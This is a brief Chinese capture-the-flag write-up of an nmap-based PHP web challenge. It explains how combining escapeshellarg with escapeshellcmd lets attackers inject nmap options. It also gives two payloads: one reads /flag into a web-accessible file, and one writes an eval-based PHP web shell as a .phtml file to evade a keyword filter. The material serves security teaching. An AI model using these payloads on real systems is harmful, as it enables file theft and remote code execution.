[朱雀组]Nmap

康康源码：
index.php
<?
require('settings.php');
​
​
set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
        	die('Web scans disabled');
	}
​
	$host = $_POST['host'];
	if(stripos($host,'php')!==false){
		die("Hacker...");
	}
	$host = escapeshellarg($host);
	$host = escapeshellcmd($host);
​
	$filename = substr(md5(time() . rand(1, 10)), 0, 5);
	$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
	$result_scan = shell_exec($command);
	if (is_null($result_scan)) {
		die('Something went wrong');
	} else {
		header('Location: result.php?f=' . $filename);
	}
else:
?>
settings.php：
<?
# Path where all files stored
# Example values: /home/node/results/
# Or just: xml/
# Must be readble/writable for web server! so chmod 777 xml/
define('RESULTS_PATH', 'xml/');
​
# Nmap string arguments for web scanning
# Example: -sV -Pn
define('NMAP_ARGS', '-Pn -T4 -F --host-timeout 1000ms');
​
# Comment this line to disable web scans
define('WEB_SCANS', 'enable');
​
# URL of application
# for example: http://example.com/scanner/
# Or just: /scanner/
define('APP_URL', '/');
​
# Secret word to protect webface (reserved)
# Uncomment to set it!
# define('secret_word', 'passw0rd1337');
​
?>
主要语句：
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
带入之后相当于：
$ nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/$filename $host
方法一：直接读flag写入文件
-iL:从文件中加载目标
-oN:将扫描后的文件信息以“Normal”的形式输出存储
 ' -iL /flag -oN flag.txt '
访问flag.txt
方法二：一句话木马绕过php过滤
'<?=eval($_GET[oatmeal]);?> -oN shell.phtml '
Last modified 8mo ago